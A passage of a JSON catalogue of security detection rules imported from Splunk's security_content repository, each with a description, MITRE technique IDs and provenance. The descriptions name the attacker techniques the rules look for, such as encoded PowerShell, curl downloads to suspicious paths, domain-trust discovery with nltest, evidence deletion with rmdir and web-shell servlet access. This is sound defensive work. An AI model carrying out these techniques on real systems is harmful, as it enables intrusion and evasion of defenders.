AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c1eea697-99ed-44c2-9b70-d8935464c499", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_hardware_addition_swapoff.yml" } }, { "id": "splunk-security-content-c1fb4edb-cab1-4359-9b40-925ffd797fb5", "type": "detection", "name": "Azure AD External Guest User Invited", "description": "The following analytic detects the invitation of an external guest user within Azure AD. It leverages Azure AD AuditLogs to identify events where an external user is invited, using fields such as operationName and initiatedBy. Monitoring these invitations is crucial as they can lead to unauthorized access if abused. If confirmed malicious, this activity could allow attackers to gain access to internal resources, potentially leading to data breaches or further exploitation of the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-external-guest-user-invited.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c1fb4edb-cab1-4359-9b40-925ffd797fb5", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_external_guest_user_invited.yml" } }, { "id": "splunk-security-content-c23b425c-9024-4bd7-b526-c18a4a51d93e", "type": "detection", "name": "Crowdstrike Medium Identity Risk Severity", "description": "The following analytic detects CrowdStrike alerts for Medium Identity Risk Severity with a risk score of 55 or higher. These alerts indicate significant vulnerabilities in user identities, such as suspicious behavior or compromised credentials. Promptly investigating and addressing these alerts is crucial to prevent potential security breaches and ensure the integrity and protection of sensitive information and systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/crowdstrike-medium-identity-risk-severity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c23b425c-9024-4bd7-b526-c18a4a51d93e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/crowdstrike_medium_identity_risk_severity.yml" } }, { "id": "splunk-security-content-c2590137-0b08-4985-9ec5-6ae23d92f63d", "type": "detection", "name": "Set Default PowerShell Execution Policy To Unrestricted or Bypass", "description": "The following analytic detects changes to the PowerShell ExecutionPolicy in the registry to \"Unrestricted\" or \"Bypass.\" It leverages data from Endpoint Detection and Response (EDR) agents, focusing on registry modifications under the path *Software\\Microsoft\\Powershell\\1\\ShellIds\\Microsoft.PowerShell*. This activity is significant because setting the ExecutionPolicy to these values can allow the execution of potentially malicious scripts without restriction. If confirmed malicious, this could enable an attacker to execute arbitrary code, leading to further compromise of the system and potential escalation of privileges.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/set-default-powershell-execution-policy-to-unrestricted-or-bypass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c2590137-0b08-4985-9ec5-6ae23d92f63d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/set_default_powershell_execution_policy_to_unrestricted_or_bypass.yml" } }, { "id": "splunk-security-content-c2998141-235a-4e31-83cf-46afb5208a87", "type": "detection", "name": "Windows DLL Module Loaded in Temp Dir", "description": "The following analytic detects instances where a Dynamic Link Library (DLL) is loaded from a temporary directory on a Windows system. Loading DLLs from non-standard paths such as %TEMP% is uncommon for legitimate applications and is often associated with adversary tradecraft, including DLL search order hijacking, side-loading, or execution of malicious payloads staged in temporary folders. Adversaries frequently leverage these directories because they are writable by standard users and often overlooked by security controls, making them convenient locations to drop and execute malicious files. This behavior may indicate attempts to evade detection, execute unauthorized code, or maintain persistence through hijacked execution flows. Detection of DLL loads from %TEMP% can help surface early signs of compromise and should be investigated in the context of the originating process, user account, and potential file creation or modification activity within the same directory.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-dll-module-loaded-in-temp-dir.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c2998141-235a-4e31-83cf-46afb5208a87", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_dll_module_loaded_in_temp_dir.yml" } }, { "id": "splunk-security-content-c2a332c3-24a2-4e24-9455-0e80332e6746", "type": "detection", "name": "Web Remote ShellServlet Access", "description": "The following analytic identifies attempts to access the Remote ShellServlet on a web server, specifically targeting Confluence servers vulnerable to CVE-2023-22518 and CVE-2023-22515. It leverages web data to detect URLs containing \"*plugins/servlet/com.jsos.shell/*\" with a status code of 200. This activity is significant as it is commonly associated with web shells and other malicious behaviors, potentially leading to unauthorized command execution. If confirmed malicious, attackers could gain remote code execution capabilities, compromising the server and potentially the entire network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/web-remote-shellservlet-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c2a332c3-24a2-4e24-9455-0e80332e6746", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/web_remote_shellservlet_access.yml" } }, { "id": "splunk-security-content-c3194009-e0eb-4f84-87a9-4070f8688f00", "type": "detection", "name": "Suspicious PlistBuddy Usage", "description": "The following analytic identifies the use of the native macOS utility, PlistBuddy, to create or modify property list (.plist) files. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions involving PlistBuddy. This activity is significant because PlistBuddy can be used to establish persistence by modifying LaunchAgents, as seen in the Silver Sparrow malware. If confirmed malicious, this could allow an attacker to maintain persistence, execute arbitrary commands, and potentially escalate privileges on the compromised macOS system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-plistbuddy-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c3194009-e0eb-4f84-87a9-4070f8688f00", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_plistbuddy_usage.yml" } }, { "id": "splunk-security-content-c32f091e-30db-11ec-8738-acde48001122", "type": "detection", "name": "Windows Curl Download to Suspicious Path", "description": "The following analytic detects the use of Windows Curl.exe to download\na file to a suspicious location, such as AppData, ProgramData, or Public directories.\nIt leverages data from Endpoint Detection and Response (EDR) agents, focusing on\ncommand-line executions that include the -O or --output options. This activity is\nsignificant because downloading files to these locations can indicate an attempt\nto bypass security controls or establish persistence. If confirmed malicious, this\nbehavior could lead to unauthorized code execution, data exfiltration, or further\ncompromise of the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-curl-download-to-suspicious-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c32f091e-30db-11ec-8738-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_curl_download_to_suspicious_path.yml" } }, { "id": "splunk-security-content-c32fab32-6aaf-492d-bfaf-acbed8e50cdf", "type": "detection", "name": "ProxyShell ProxyNotShell Behavior Detected", "description": "The following analytic identifies potential exploitation of Windows Exchange servers via ProxyShell or ProxyNotShell vulnerabilities, followed by post-exploitation activities such as running nltest, Cobalt Strike, Mimikatz, and adding new users. It leverages data from multiple analytic stories, requiring at least five distinct sources to trigger, thus reducing noise. This activity is significant as it indicates a high likelihood of an active compromise, potentially leading to unauthorized access, privilege escalation, and persistent threats within the environment. If confirmed malicious, attackers could gain control over the Exchange server, exfiltrate data, and maintain long-term access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/proxyshell-proxynotshell-behavior-detected.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c32fab32-6aaf-492d-bfaf-acbed8e50cdf", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/proxyshell_proxynotshell_behavior_detected.yml" } }, { "id": "splunk-security-content-c396a0c4-c9f2-11eb-b4f5-acde48001122", "type": "detection", "name": "Powershell Using memory As Backing Store", "description": "The following analytic detects suspicious PowerShell script execution using memory streams as a backing store, identified via EventCode 4104. It leverages PowerShell Script Block Logging to capture scripts that create new objects with memory streams, often used to decompress and execute payloads in memory. This activity is significant as it indicates potential in-memory execution of malicious code, bypassing traditional file-based detection. If confirmed malicious, this technique could allow attackers to execute arbitrary code, maintain persistence, or escalate privileges without leaving a trace on the disk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/powershell-using-memory-as-backing-store.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c396a0c4-c9f2-11eb-b4f5-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/powershell_using_memory_as_backing_store.yml" } }, { "id": "splunk-security-content-c3bc1430-04e7-4178-835f-047d8e6e97df", "type": "detection", "name": "Detect Regasm with no Command Line Arguments", "description": "The following analytic detects instances of regasm.exe running without command line arguments. This behavior typically indicates process injection, where another process manipulates regasm.exe. The detection leverages Endpoint Detection and Response (EDR) data, focusing on process names and command-line executions. This activity is significant as it may signal an attempt to evade detection or execute malicious code. If confirmed malicious, attackers could achieve code execution, potentially leading to privilege escalation, persistence, or access to sensitive information. Investigate network connections, parallel processes, and suspicious module loads for further context.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.009" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-regasm-with-no-command-line-arguments.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c3bc1430-04e7-4178-835f-047d8e6e97df", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_regasm_with_no_command_line_arguments.yml" } }, { "id": "splunk-security-content-c3be767e-7959-44c5-8976-0e9c12a91ad2", "type": "detection", "name": "Detect IPv6 Network Infrastructure Threats", "description": "The following analytic detects IPv6 network infrastructure threats by identifying suspicious activities such as IP and MAC address theft or packet drops. It leverages logs from Cisco network devices configured with First Hop Security measures like RA Guard and DHCP Guard. This activity is significant as it can indicate attempts to compromise network integrity and security. If confirmed malicious, attackers could manipulate network traffic, leading to potential data interception, unauthorized access, or network disruption.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1200", "T1498", "T1557.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-ipv6-network-infrastructure-threats.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c3be767e-7959-44c5-8976-0e9c12a91ad2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/detect_ipv6_network_infrastructure_threats.yml" } }, { "id": "splunk-security-content-c3d22720-35d3-4da4-bd0a-740d37192bd4", "type": "detection", "name": "Okta New API Token Created", "description": "The following analytic detects the creation of a new API token within an Okta tenant. It uses OktaIm2 logs ingested via the Splunk Add-on for Okta Identity Cloud to identify events where the `system.api_token.create` command is executed. This activity is significant because creating a new API token can indicate potential account takeover attempts or unauthorized access, allowing an adversary to maintain persistence. If confirmed malicious, this could enable attackers to execute API calls, access sensitive data, and perform administrative actions within the Okta environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/okta-new-api-token-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c3d22720-35d3-4da4-bd0a-740d37192bd4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/okta_new_api_token_created.yml" } }, { "id": "splunk-security-content-c3e05466-5f22-11eb-ae93-0242ac130002", "type": "detection", "name": "NLTest Domain Trust Discovery", "description": "The following analytic identifies the execution of `nltest.exe` with command-line arguments `/domain_trusts` or `/all_trusts` to query Domain Trust information. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs and command-line arguments. This activity is significant as it indicates potential reconnaissance efforts by adversaries to understand domain trust relationships, which can inform their lateral movement strategies. If confirmed malicious, this activity could enable attackers to map out trusted domains, facilitating further compromise and pivoting within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1482" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/nltest-domain-trust-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c3e05466-5f22-11eb-ae93-0242ac130002", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/nltest_domain_trust_discovery.yml" } }, { "id": "splunk-security-content-c3f48aa9-878e-443f-8889-e42a11a9bea9", "type": "detection", "name": "Microsoft Intune Bulk Wipe", "description": "The following analytic detects a high volume of \"wipe ManagedDevice\" events from the Intune admin portal (5+ per hour by default).\nIt leverages Intune audit logs to identify when this action is triggered. This activity is significant beacuse the \"wipe ManagedDevice\" action factory resets devices connected to your Microsoft Intune tenant.\nIf confirmed malicious, an attacker can abuse this action to perform a large-scale data wiping attack against your managed endpoints.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1561.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/microsoft-intune-bulk-wipe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c3f48aa9-878e-443f-8889-e42a11a9bea9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/microsoft_intune_bulk_wipe.yml" } }, { "id": "splunk-security-content-c3f85976-94a5-11ec-9a58-acde48001122", "type": "detection", "name": "Windows Excessive Disabled Services Event", "description": "The following analytic identifies an excessive number of system events where services are modified from start to disabled. It leverages Windows Event Logs (EventCode 7040) to detect multiple service state changes on a single host. This activity is significant as it may indicate an adversary attempting to disable security applications or other critical services, potentially leading to defense evasion or destructive actions. If confirmed malicious, this behavior could allow attackers to disable security defenses, disrupt system operations, and achieve their objectives on the compromised system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-excessive-disabled-services-event.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c3f85976-94a5-11ec-9a58-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_excessive_disabled_services_event.yml" } }, { "id": "splunk-security-content-c427bafb-0b2c-4b18-ad85-c03c6fed9e75", "type": "detection", "name": "Windows Modify Registry USeWuServer", "description": "The following analytic detects a suspicious modification to the Windows Update configuration registry key \"UseWUServer.\" It leverages data from the Endpoint.Registry data model to identify changes where the registry value is set to \"0x00000001.\" This activity is significant because it is commonly used by adversaries, including malware like RedLine Stealer, to bypass detection mechanisms and potentially exploit zero-day vulnerabilities. If confirmed malicious, this modification could allow attackers to evade defenses, persist on the target host, and deploy additional malicious payloads.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-usewuserver.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c427bafb-0b2c-4b18-ad85-c03c6fed9e75", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_usewuserver.yml" } }, { "id": "splunk-security-content-c43f7b49-2dab-4e76-892e-7f971c2f20f1", "type": "detection", "name": "Cisco Secure Firewall - Blacklisted SSL Certificate Fingerprint", "description": "The following analytic detects the use of known suspicious SSL certificates in any observed event where the SSL_CertFingerprint field is present. It leverages Cisco Secure Firewall logs and compares the SSL certificate SHA1 fingerprint against a blacklist of certificates associated with malware distribution, command and control (C2) infrastructure, or phishing campaigns. This activity is significant as adversaries often reuse or self-sign certificates across malicious infrastructure, allowing defenders to track and detect encrypted sessions even when domains or IPs change. If confirmed malicious, this may indicate beaconing, malware download, or data exfiltration over TLS/SSL.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1587.002", "T1588.004", "T1071.001", "T1573.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-secure-firewall-blacklisted-ssl-certificate-fingerprint.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c43f7b49-2dab-4e76-892e-7f971c2f20f1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___blacklisted_ssl_certificate_fingerprint.yml" } }, { "id": "splunk-security-content-c448488c-b7ec-11eb-8253-acde48001122", "type": "detection", "name": "Services Escalate Exe", "description": "The following analytic identifies the execution of a randomly named binary via `services.exe`, indicative of privilege escalation using Cobalt Strike's `svc-exe`. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process lineage and command-line executions. This activity is significant as it often follows initial access, allowing adversaries to escalate privileges and establish persistence. If confirmed malicious, this behavior could enable attackers to execute arbitrary code, maintain long-term access, and potentially move laterally within the network, posing a severe threat to the organization's security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/services-escalate-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c448488c-b7ec-11eb-8253-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/services_escalate_exe.yml" } }, { "id": "splunk-security-content-c4566d2c-b094-48a1-9c59-d66e22065560", "type": "detection", "name": "Windows Indicator Removal Via Rmdir", "description": "The following analytic detects the execution of the 'rmdir' command with '/s' and '/q' options to delete files and directory trees. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions and process metadata. This activity is significant as it may indicate malware attempting to remove traces or components during cleanup operations. If confirmed malicious, this behavior could allow attackers to eliminate forensic evidence, hinder incident response efforts, and maintain persistence by removing indicators of compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-indicator-removal-via-rmdir.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c4566d2c-b094-48a1-9c59-d66e22065560", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_indicator_removal_via_rmdir.yml" } }, { "id": "splunk-security-content-c4824cc6-d644-458e-a39a-67cd67da75e3", "type": "detection", "name": "Cisco Duo Admin Login Unusual Os", "description": "The following analytic identifies Duo admin login attempts from operating systems that are unusual for your environment, excluding commonly used OS such as Mac OS X. Please adjust to your environment. It works by analyzing Duo activity logs for admin login actions and filtering out logins from expected operating systems. The analytic then aggregates events by browser, version, source IP, location, and OS details to highlight anomalies. Detecting admin logins from unexpected operating systems is critical for a SOC, as it may indicate credential compromise, unauthorized access, or attacker activity using unfamiliar devices. Such behavior can precede privilege escalation, policy changes, or other malicious actions within the Duo environment. Early detection enables rapid investigation and response, reducing the risk of account takeover and minimizing potential damage to organizational security controls.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-duo-admin-login-unusual-os.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c4824cc6-d644-458e-a39a-67cd67da75e3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/cisco_duo_admin_login_unusual_os.yml" } }, { "id": "splunk-security-content-c48a155b-2861-417a-813c-220f5272cf01", "type": "detection", "name": "ESXi Audit Tampering", "description": "This detection identifies the use of the esxcli system auditrecords commands, which can be used to tamper with logging on an ESXi host. This action may indicate an attempt to evade detection or hinder forensic analysis by preventing the recording of system-level audit events.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.003", "T1070" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/esxi-audit-tampering.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c48a155b-2861-417a-813c-220f5272cf01", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/esxi_audit_tampering.yml" } }, { "id": "splunk-security-content-c4aeeeef-da7f-4338-b3ba-553cbcbe2138", "type": "detection", "name": "Windows AD Rogue Domain Controller Network Activity", "description": "The following analytic identifies unauthorized replication RPC calls from non-domain controller devices. It leverages Zeek wire data to detect specific RPC operations like DrsReplicaAdd and DRSGetNCChanges, filtering out legitimate domain controllers. This activity is significant as it may indicate an attempt to introduce a rogue domain controller, which can compromise the integrity of the Active Directory environment. If confirmed malicious, this could allow attackers to manipulate directory data, escalate privileges, and persist within the network, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1207" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-rogue-domain-controller-network-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c4aeeeef-da7f-4338-b3ba-553cbcbe2138", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/windows_ad_rogue_domain_controller_network_activity.yml" } }, { "id": "splunk-security-content-c4db14d9-7909-48b4-a054-aa14d89dbb19", "type": "detection", "name": "Malicious PowerShell Process - Encoded Command", "description": "The following analytic detects the use of the EncodedCommand parameter in PowerShell processes.\nIt leverages Endpoint Detection and Response (EDR) data to identify variations of the EncodedCommand parameter, including shortened forms and different command switch types.\nThis activity can be significant because adversaries often use encoded commands to obfuscate malicious scripts, making detection harder.\nIf confirmed malicious, this behavior could allow attackers to execute hidden code, potentially leading to unauthorized access, privilege escalation, or persistent threats within the environment.\nReview parallel events to determine legitimacy and tune based on known administrative scripts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1027" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/malicious-powershell-process-encoded-command.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c4db14d9-7909-48b4-a054-aa14d89dbb19", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/malicious_powershell_process___encoded_command.yml" } }, { "id": "splunk-security-content-c53a8e62-f741-11ee-9f6e-acde48001122", "type": "detection", "name": "AWS Bedrock Invoke Model Access Denied", "description": "The following analytic identifies access denied error when attempting to invoke AWS Bedrock models. It leverages AWS CloudTrail logs to detect when a user or service receives an AccessDenied error when calling the InvokeModel API. This activity is significant as it may indicate an adversary attempting to access Bedrock models with insufficient permissions after compromising credentials. If confirmed malicious, this could suggest reconnaissance activities or privilege escalation attempts targeting generative AI resources, potentially leading to data exfiltration or manipulation of model outputs.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078", "T1550" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-bedrock-invoke-model-access-denied.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "c53a8e62-f741-11ee-9f6e-acde48001122", 